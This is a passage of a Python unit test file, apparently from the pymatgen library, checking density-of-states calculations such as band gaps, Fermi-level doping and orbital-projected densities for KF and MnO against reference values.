dos.get_interpolated_gap(tol=0.001, abs_tol=False, spin=None)[0],
2.16815942458015,
7,
)
self.assertAlmostEqual(dos.get_cbm_vbm(), (3.8729, 1.8140000000000001))
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[Spin.up], 1.744588888888891, 7)
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[Spin.down], 1.756888888888886, 7)
self.assertRaises(ValueError, dos.get_interpolated_value, 1000)
def test_get_smeared_densities(self):
dos = self.dos
smeared = dos.get_smeared_densities(0.2)
dens = dos.densities
for spin in Spin:
self.assertAlmostEqual(sum(dens[spin]), sum(smeared[spin]))
def test_as_dict(self):
dos_dict = self.dos.as_dict()
self.assertIsInstance(dos_dict["energies"], list)
self.assertIsInstance(dos_dict["energies"][0], float)
self.assertNotIsInstance(dos_dict["energies"][0], np.float64)
self.assertIsInstance(dos_dict["densities"]["1"], list)
self.assertIsInstance(dos_dict["densities"]["1"][0], float)
self.assertNotIsInstance(dos_dict["densities"]["1"][0], np.float64)
class FermiDosTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "complete_dos.json"), "r") as f:
self.dos = CompleteDos.from_dict(json.load(f))
self.dos = FermiDos(self.dos)
def test_doping_fermi(self):
T = 300
fermi0 = self.dos.efermi
frange = [fermi0 - 0.5, fermi0, fermi0 + 2.0, fermi0 + 2.2]
dopings = [self.dos.get_doping(fermi_level=f, temperature=T) for f in frange]
ref_dopings = [3.48077e21, 1.9235e18, -2.6909e16, -4.8723e19]
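        # In these reference values hole (p-type) doping is positive and electron (n-type) doping is
        # negative, so Fermi levels below mid-gap give large positive concentrations and vice versa.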
for i, c_ref in enumerate(ref_dopings):
self.assertLessEqual(abs(dopings[i] / c_ref - 1.0), 0.01)
calc_fermis = [self.dos.get_fermi(concentration=c, temperature=T) for c in ref_dopings]
for j, f_ref in enumerate(frange):
self.assertAlmostEqual(calc_fermis[j], f_ref, 4)
sci_dos = FermiDos(self.dos, bandgap=3.0)
self.assertEqual(sci_dos.get_gap(), 3.0)
old_cbm, old_vbm = self.dos.get_cbm_vbm()
old_gap = old_cbm - old_vbm
new_cbm, new_vbm = sci_dos.get_cbm_vbm()
self.assertAlmostEqual(new_cbm - old_cbm, (3.0 - old_gap) / 2.0)
self.assertAlmostEqual(old_vbm - new_vbm, (3.0 - old_gap) / 2.0)
for i, c_ref in enumerate(ref_dopings):
if c_ref < 0:
self.assertAlmostEqual(sci_dos.get_fermi(c_ref, temperature=T) - frange[i], 0.47, places=2)
else:
self.assertAlmostEqual(sci_dos.get_fermi(c_ref, temperature=T) - frange[i], -0.47, places=2)
self.assertAlmostEqual(sci_dos.get_fermi_interextrapolated(-1e26, 300), 7.5108, 4)
self.assertAlmostEqual(sci_dos.get_fermi_interextrapolated(1e26, 300), -1.4182, 4)
self.assertAlmostEqual(sci_dos.get_fermi_interextrapolated(0.0, 300), 2.5226, 4)
def test_as_dict(self):
dos_dict = self.dos.as_dict()
self.assertIsInstance(dos_dict["energies"], list)
self.assertIsInstance(dos_dict["energies"][0], float)
self.assertNotIsInstance(dos_dict["energies"][0], np.float64)
self.assertIsInstance(dos_dict["densities"]["1"], list)
self.assertIsInstance(dos_dict["densities"]["1"][0], float)
self.assertNotIsInstance(dos_dict["densities"]["1"][0], np.float64)
class CompleteDosTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "complete_dos.json"), "r") as f:
self.dos = CompleteDos.from_dict(json.load(f))
def test_get_gap(self):
dos = self.dos
self.assertAlmostEqual(dos.get_gap(), 2.0589, 4, "Wrong gap from dos!")
self.assertEqual(len(dos.energies), 301)
self.assertAlmostEqual(
dos.get_interpolated_gap(tol=0.001, abs_tol=False, spin=None)[0],
2.16815942458015,
7,
)
spd_dos = dos.get_spd_dos()
self.assertEqual(len(spd_dos), 3)
el_dos = dos.get_element_dos()
self.assertEqual(len(el_dos), 4)
sum_spd = spd_dos[OrbitalType.s] + spd_dos[OrbitalType.p] + spd_dos[OrbitalType.d]
sum_element = None
for pdos in el_dos.values():
if sum_element is None:
sum_element = pdos
else:
sum_element += pdos
# The sums of the SPD or the element doses should be the same.
self.assertTrue((abs(sum_spd.energies - sum_element.energies) < 0.0001).all())
self.assertTrue((abs(sum_spd.densities[Spin.up] - sum_element.densities[Spin.up]) < 0.0001).all())
self.assertTrue((abs(sum_spd.densities[Spin.down] - sum_element.densities[Spin.down]) < 0.0001).all())
site = dos.structure[0]
self.assertIsNotNone(dos.get_site_dos(site))
self.assertAlmostEqual(sum(dos.get_site_dos(site).get_densities(Spin.up)), 2.0391)
self.assertAlmostEqual(sum(dos.get_site_dos(site).get_densities(Spin.down)), 2.0331999999999995)
self.assertIsNotNone(dos.get_site_orbital_dos(site, Orbital.s))
egt2g = dos.get_site_t2g_eg_resolved_dos(site)
self.assertAlmostEqual(sum(egt2g["e_g"].get_densities(Spin.up)), 0.0)
self.assertAlmostEqual(sum(egt2g["t2g"].get_densities(Spin.up)), 0.0)
egt2g = dos.get_site_t2g_eg_resolved_dos(dos.structure[4])
self.assertAlmostEqual(sum(egt2g["e_g"].get_densities(Spin.up)), 15.004399999999997)
self.assertAlmostEqual(sum(egt2g["t2g"].get_densities(Spin.up)), 22.910399999999999)
self.assertAlmostEqual(dos.get_cbm_vbm(), (3.8729, 1.8140000000000001))
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[Spin.up], 1.744588888888891, 7)
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[Spin.down], 1.756888888888886, 7)
self.assertRaises(ValueError, dos.get_interpolated_value, 1000)
def test_to_from_dict(self):
d = self.dos.as_dict()
dos = CompleteDos.from_dict(d)
el_dos = dos.get_element_dos()
self.assertEqual(len(el_dos), 4)
spd_dos = dos.get_spd_dos()
sum_spd = spd_dos[OrbitalType.s] + spd_dos[OrbitalType.p] + spd_dos[OrbitalType.d]
sum_element = None
for pdos in el_dos.values():
if sum_element is None:
sum_element = pdos
else:
sum_element += pdos
# The sums of the SPD or the element doses should be the same.
self.assertTrue((abs(sum_spd.energies - sum_element.energies) < 0.0001).all())
def test_str(self):
self.assertIsNotNone(str(self.dos))
def test_as_dict(self):
dos_dict = self.dos.as_dict()
self.assertIsInstance(dos_dict["energies"], list)
self.assertIsInstance(dos_dict["energies"][0], float)
self.assertNotIsInstance(dos_dict["energies"][0], np.float64)
self.assertIsInstance(dos_dict["densities"]["1"], list)
self.assertIsInstance(dos_dict["densities"]["1"][0], float)
self.assertNotIsInstance(dos_dict["densities"]["1"][0], np.float64)
class DOSTest(PymatgenTest):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "complete_dos.json"), "r") as f:
d = json.load(f)
y = list(zip(d["densities"]["1"], d["densities"]["-1"]))
self.dos = DOS(d["energies"], y, d["efermi"])
def test_get_gap(self):
dos = self.dos
self.assertAlmostEqual(dos.get_gap(), 2.0589, 4)
self.assertEqual(len(dos.x), 301)
self.assertAlmostEqual(
dos.get_interpolated_gap(tol=0.001, abs_tol=False, spin=None)[0],
2.16815942458015,
7,
)
self.assertArrayAlmostEqual(dos.get_cbm_vbm(), (3.8729, 1.8140000000000001))
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[0], 1.744588888888891, 7)
self.assertAlmostEqual(dos.get_interpolated_value(9.9)[1], 1.756888888888886, 7)
self.assertRaises(ValueError, dos.get_interpolated_value, 1000)
self.assertArrayAlmostEqual(dos.get_cbm_vbm(spin=Spin.up), (3.8729, 1.2992999999999999))
self.assertArrayAlmostEqual(dos.get_cbm_vbm(spin=Spin.down), (4.645, 1.8140000000000001))
class SpinPolarizationTest(unittest.TestCase):
def test_spin_polarization(self):
dos_path = os.path.join(PymatgenTest.TEST_FILES_DIR, "dos_spin_polarization_mp-865805.json")
dos = loadfn(dos_path)
self.assertAlmostEqual(dos.spin_polarization, 0.6460514663341762)
class LobsterCompleteDosTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "LobsterCompleteDos_spin.json"), "r") as f:
data_spin = json.load(f)
self.LobsterCompleteDOS_spin = LobsterCompleteDos.from_dict(data_spin)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "LobsterCompleteDos_nonspin.json"), "r") as f:
data_nonspin = json.load(f)
self.LobsterCompleteDOS_nonspin = LobsterCompleteDos.from_dict(data_nonspin)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "structure_KF.json"), "r") as f:
data_structure = json.load(f)
self.structure = Structure.from_dict(data_structure)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "LobsterCompleteDos_MnO.json"), "r") as f:
data_MnO = json.load(f)
self.LobsterCompleteDOS_MnO = LobsterCompleteDos.from_dict(data_MnO)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "LobsterCompleteDos_MnO_nonspin.json"), "r") as f:
data_MnO_nonspin = json.load(f)
self.LobsterCompleteDOS_MnO_nonspin = LobsterCompleteDos.from_dict(data_MnO_nonspin)
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "structure_MnO.json"), "r") as f:
data_MnO = json.load(f)
self.structure_MnO = Structure.from_dict(data_MnO)
def test_get_site_orbital_dos(self):
# with spin polarization
energies_spin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
fermi = 0.0
PDOS_F_2s_up = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2s_down = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2py_up = [0.00000, 0.00160, 0.00000, 0.25801, 0.00000, 0.00029]
PDOS_F_2py_down = [0.00000, 0.00161, 0.00000, 0.25819, 0.00000, 0.00029]
PDOS_F_2pz_up = [0.00000, 0.00161, 0.00000, 0.25823, 0.00000, 0.00029]
PDOS_F_2pz_down = [0.00000, 0.00160, 0.00000, 0.25795, 0.00000, 0.00029]
PDOS_F_2px_up = [0.00000, 0.00160, 0.00000, 0.25805, 0.00000, 0.00029]
PDOS_F_2px_down = [0.00000, 0.00161, 0.00000, 0.25814, 0.00000, 0.00029]
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2s").energies.tolist(),
energies_spin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2s").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2s")
.densities[Spin.up]
.tolist(),
PDOS_F_2s_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2s")
.densities[Spin.down]
.tolist(),
PDOS_F_2s_down,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z").energies.tolist(),
energies_spin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y")
.densities[Spin.up]
.tolist(),
PDOS_F_2py_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y")
.densities[Spin.down]
.tolist(),
PDOS_F_2py_down,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y").energies.tolist(),
energies_spin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z")
.densities[Spin.up]
.tolist(),
PDOS_F_2pz_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z")
.densities[Spin.down]
.tolist(),
PDOS_F_2pz_down,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x").energies.tolist(),
energies_spin,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x")
.densities[Spin.up]
.tolist(),
PDOS_F_2px_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x")
.densities[Spin.down]
.tolist(),
PDOS_F_2px_down,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x").efermi,
fermi,
)
# without spin polarization
energies_nonspin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
PDOS_F_2s = [0.00000, 0.00320, 0.00000, 0.00017, 0.00000, 0.00060]
PDOS_F_2py = [0.00000, 0.00322, 0.00000, 0.51635, 0.00000, 0.00037]
PDOS_F_2pz = [0.00000, 0.00322, 0.00000, 0.51636, 0.00000, 0.00037]
PDOS_F_2px = [0.00000, 0.00322, 0.00000, 0.51634, 0.00000, 0.00037]
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(
site=self.structure[0], orbital="2s"
).energies.tolist(),
energies_nonspin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2s").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2s")
.densities[Spin.up]
.tolist(),
PDOS_F_2s,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(
site=self.structure[0], orbital="2p_y"
).energies.tolist(),
energies_nonspin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_y")
.densities[Spin.up]
.tolist(),
PDOS_F_2py,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(
site=self.structure[0], orbital="2p_z"
).energies.tolist(),
energies_nonspin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_z")
.densities[Spin.up]
.tolist(),
PDOS_F_2pz,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(
site=self.structure[0], orbital="2p_x"
).energies.tolist(),
energies_nonspin,
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x").efermi,
fermi,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_site_orbital_dos(site=self.structure[0], orbital="2p_x")
.densities[Spin.up]
.tolist(),
PDOS_F_2px,
)
def test_get_site_t2g_eg_resolved_dos(self):
# with spin polarization
energies = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
efermi = 0.0
PDOS_Mn_3dxy_up = [0.00000, 0.00001, 0.10301, 0.16070, 0.00070, 0.00060]
PDOS_Mn_3dxy_down = [0.00000, 0.00000, 0.00380, 0.00996, 0.03012, 0.21890]
PDOS_Mn_3dyz_up = [0.00000, 0.00001, 0.10301, 0.16070, 0.00070, 0.00060]
PDOS_Mn_3dyz_down = [0.00000, 0.00000, 0.00380, 0.00996, 0.03012, 0.21890]
PDOS_Mn_3dz2_up = [0.00000, 0.00001, 0.09608, 0.16941, 0.00028, 0.00028]
PDOS_Mn_3dz2_down = [0.00000, 0.00000, 0.00433, 0.00539, 0.06000, 0.19427]
PDOS_Mn_3dxz_up = [0.00000, 0.00001, 0.09746, 0.16767, 0.00036, 0.00034]
PDOS_Mn_3dxz_down = [0.00000, 0.00000, 0.00422, 0.00630, 0.05402, 0.19919]
PDOS_Mn_3dx2_up = [0.00000, 0.00001, 0.09330, 0.17289, 0.00011, 0.00015]
PDOS_Mn_3dx2_down = [0.00000, 0.00000, 0.00454, 0.00356, 0.07195, 0.18442]
PDOS_Mn_eg_up = (np.array(PDOS_Mn_3dx2_up) + np.array(PDOS_Mn_3dz2_up)).tolist()
PDOS_Mn_eg_down = (np.array(PDOS_Mn_3dx2_down) + np.array(PDOS_Mn_3dz2_down)).tolist()
PDOS_Mn_t2g_up = (np.array(PDOS_Mn_3dxy_up) + np.array(PDOS_Mn_3dxz_up) + np.array(PDOS_Mn_3dyz_up)).tolist()
PDOS_Mn_t2g_down = (
np.array(PDOS_Mn_3dxy_down) + np.array(PDOS_Mn_3dxz_down) + np.array(PDOS_Mn_3dyz_down)
).tolist()
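        # In an octahedral field the d orbitals split into e_g (d_z2, d_x2-y2) and t2g (d_xy, d_xz, d_yz);
        # the per-orbital reference lists above are summed accordingly before comparing with the resolved DOS.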
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_eg_up[iel])
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"]
.densities[Spin.down]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_eg_down[iel])
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_t2g_up[iel])
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"]
.densities[Spin.down]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_t2g_down[iel])
self.assertListEqual(
energies,
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"].energies.tolist(),
)
self.assertListEqual(
energies,
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"].energies.tolist(),
)
self.assertEqual(
efermi,
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"].efermi,
)
self.assertEqual(
efermi,
self.LobsterCompleteDOS_MnO.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"].efermi,
)
# without spin polarization
energies_nonspin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
PDOS_Mn_3dxy = [0.00000, 0.00000, 0.02032, 0.16094, 0.33659, 0.01291]
PDOS_Mn_3dyz = [0.00000, 0.00000, 0.02032, 0.16126, 0.33628, 0.01290]
PDOS_Mn_3dz2 = [0.00000, 0.00000, 0.02591, 0.31460, 0.18658, 0.00509]
PDOS_Mn_3dxz = [0.00000, 0.00000, 0.02484, 0.28501, 0.21541, 0.00663]
PDOS_Mn_3dx2 = [0.00000, 0.00000, 0.02817, 0.37594, 0.12669, 0.00194]
PDOS_Mn_eg = (np.array(PDOS_Mn_3dx2) + np.array(PDOS_Mn_3dz2)).tolist()
PDOS_Mn_t2g = (np.array(PDOS_Mn_3dxy) + np.array(PDOS_Mn_3dxz) + np.array(PDOS_Mn_3dyz)).tolist()
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_eg[iel])
for iel, el in enumerate(
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(el, PDOS_Mn_t2g[iel])
self.assertListEqual(
energies_nonspin,
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])[
"e_g"
].energies.tolist(),
)
self.assertListEqual(
energies_nonspin,
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])[
"t2g"
].energies.tolist(),
)
self.assertEqual(
efermi,
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["e_g"].efermi,
)
self.assertEqual(
efermi,
self.LobsterCompleteDOS_MnO_nonspin.get_site_t2g_eg_resolved_dos(self.structure_MnO[1])["t2g"].efermi,
)
def test_get_spd_dos(self):
# with spin polarization
energies_spin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
fermi = 0.0
PDOS_F_2s_up = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2s_down = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2py_up = [0.00000, 0.00160, 0.00000, 0.25801, 0.00000, 0.00029]
PDOS_F_2py_down = [0.00000, 0.00161, 0.00000, 0.25819, 0.00000, 0.00029]
PDOS_F_2pz_up = [0.00000, 0.00161, 0.00000, 0.25823, 0.00000, 0.00029]
PDOS_F_2pz_down = [0.00000, 0.00160, 0.00000, 0.25795, 0.00000, 0.00029]
PDOS_F_2px_up = [0.00000, 0.00160, 0.00000, 0.25805, 0.00000, 0.00029]
PDOS_F_2px_down = [0.00000, 0.00161, 0.00000, 0.25814, 0.00000, 0.00029]
PDOS_K_3s_up = [0.00000, 0.00000, 0.00000, 0.00008, 0.00000, 0.00007]
PDOS_K_3s_down = [0.00000, 0.00000, 0.00000, 0.00008, 0.00000, 0.00007]
PDOS_K_4s_up = [0.00000, 0.00018, 0.00000, 0.02035, 0.00000, 0.02411]
PDOS_K_4s_down = [0.00000, 0.00018, 0.00000, 0.02036, 0.00000, 0.02420]
PDOS_K_3py_up = [0.00000, 0.26447, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3py_down = [0.00000, 0.26446, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3pz_up = [0.00000, 0.26446, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3pz_down = [0.00000, 0.26447, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3px_up = [0.00000, 0.26447, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_K_3px_down = [0.00000, 0.26446, 0.00000, 0.00172, 0.00000, 0.00000]
PDOS_s_up = (np.array(PDOS_F_2s_up) + np.array(PDOS_K_3s_up) + np.array(PDOS_K_4s_up)).tolist()
PDOS_s_down = (np.array(PDOS_F_2s_down) + np.array(PDOS_K_3s_down) + np.array(PDOS_K_4s_down)).tolist()
PDOS_p_up = (
np.array(PDOS_F_2py_up)
+ np.array(PDOS_F_2pz_up)
+ np.array(PDOS_F_2px_up)
+ np.array(PDOS_K_3py_up)
+ np.array(PDOS_K_3pz_up)
+ np.array(PDOS_K_3px_up)
).tolist()
PDOS_p_down = (
np.array(PDOS_F_2py_down)
+ np.array(PDOS_F_2pz_down)
+ np.array(PDOS_F_2px_down)
+ np.array(PDOS_K_3py_down)
+ np.array(PDOS_K_3pz_down)
+ np.array(PDOS_K_3px_down)
).tolist()
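        # The expected s- and p-projected DOS are built by summing the per-orbital references over both
        # sites (F 2s + K 3s + K 4s for s; all F 2p and K 3p orbitals for p) before comparing below.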
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(0)].energies.tolist(),
energies_spin,
)
self.assertEqual(self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(0)].efermi, fermi)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(0)].densities[Spin.up].tolist()
):
self.assertAlmostEqual(listel, PDOS_s_up[ilistel])
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(0)].densities[Spin.down].tolist()
):
self.assertAlmostEqual(listel, PDOS_s_down[ilistel])
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(1)].densities[Spin.up].tolist()
):
self.assertAlmostEqual(listel, PDOS_p_up[ilistel])
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_spd_dos()[OrbitalType(1)].densities[Spin.down].tolist()
):
self.assertAlmostEqual(listel, PDOS_p_down[ilistel])
# without spin polarization
energies_nonspin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
PDOS_F_2s = [0.00000, 0.00320, 0.00000, 0.00017, 0.00000, 0.00060]
PDOS_F_2py = [0.00000, 0.00322, 0.00000, 0.51635, 0.00000, 0.00037]
PDOS_F_2pz = [0.00000, 0.00322, 0.00000, 0.51636, 0.00000, 0.00037]
PDOS_F_2px = [0.00000, 0.00322, 0.00000, 0.51634, 0.00000, 0.00037]
PDOS_K_3s = [0.00000, 0.00000, 0.00000, 0.00005, 0.00000, 0.00004]
PDOS_K_4s = [0.00000, 0.00040, 0.00000, 0.04039, 0.00000, 0.02241]
PDOS_K_3py = [0.00000, 0.52891, 0.00000, 0.00345, 0.00000, 0.00000]
PDOS_K_3pz = [0.00000, 0.52891, 0.00000, 0.00345, 0.00000, 0.00000]
PDOS_K_3px = [0.00000, 0.52891, 0.00000, 0.00345, 0.00000, 0.00000]
PDOS_s = (np.array(PDOS_F_2s) + np.array(PDOS_K_3s) + np.array(PDOS_K_4s)).tolist()
PDOS_p = (
np.array(PDOS_F_2py)
+ np.array(PDOS_F_2pz)
+ np.array(PDOS_F_2px)
+ np.array(PDOS_K_3py)
+ np.array(PDOS_K_3pz)
+ np.array(PDOS_K_3px)
).tolist()
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_spd_dos()[OrbitalType(0)].energies.tolist(),
energies_nonspin,
)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_nonspin.get_spd_dos()[OrbitalType(0)].densities[Spin.up].tolist()
):
self.assertAlmostEqual(listel, PDOS_s[ilistel])
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_nonspin.get_spd_dos()[OrbitalType(1)].densities[Spin.up].tolist()
):
self.assertAlmostEqual(listel, PDOS_p[ilistel])
def test_get_element_spd_dos(self):
# with spin polarization
energies_spin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
fermi = 0.0
PDOS_F_2s_up = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2s_down = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2py_up = [0.00000, 0.00160, 0.00000, 0.25801, 0.00000, 0.00029]
PDOS_F_2py_down = [0.00000, 0.00161, 0.00000, 0.25819, 0.00000, 0.00029]
PDOS_F_2pz_up = [0.00000, 0.00161, 0.00000, 0.25823, 0.00000, 0.00029]
PDOS_F_2pz_down = [0.00000, 0.00160, 0.00000, 0.25795, 0.00000, 0.00029]
PDOS_F_2px_up = [0.00000, 0.00160, 0.00000, 0.25805, 0.00000, 0.00029]
PDOS_F_2px_down = [0.00000, 0.00161, 0.00000, 0.25814, 0.00000, 0.00029]
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)].energies.tolist(),
energies_spin,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)]
.densities[Spin.up]
.tolist(),
PDOS_F_2s_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)]
.densities[Spin.down]
.tolist(),
PDOS_F_2s_down,
)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(1)]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(
listel,
(np.array(PDOS_F_2px_up) + np.array(PDOS_F_2py_up) + np.array(PDOS_F_2pz_up)).tolist()[ilistel],
)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(1)]
.densities[Spin.down]
.tolist()
):
self.assertAlmostEqual(
listel,
(np.array(PDOS_F_2px_down) + np.array(PDOS_F_2py_down) + np.array(PDOS_F_2pz_down)).tolist()[ilistel],
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)].efermi,
fermi,
)
# without spin polarization
energies_nonspin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
efermi = 0.0
PDOS_F_2s = [0.00000, 0.00320, 0.00000, 0.00017, 0.00000, 0.00060]
PDOS_F_2py = [0.00000, 0.00322, 0.00000, 0.51635, 0.00000, 0.00037]
PDOS_F_2pz = [0.00000, 0.00322, 0.00000, 0.51636, 0.00000, 0.00037]
PDOS_F_2px = [0.00000, 0.00322, 0.00000, 0.51634, 0.00000, 0.00037]
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)].energies.tolist(),
energies_nonspin,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)]
.densities[Spin.up]
.tolist(),
PDOS_F_2s,
)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_nonspin.get_element_spd_dos(el=Element("F"))[OrbitalType(1)]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(
listel,
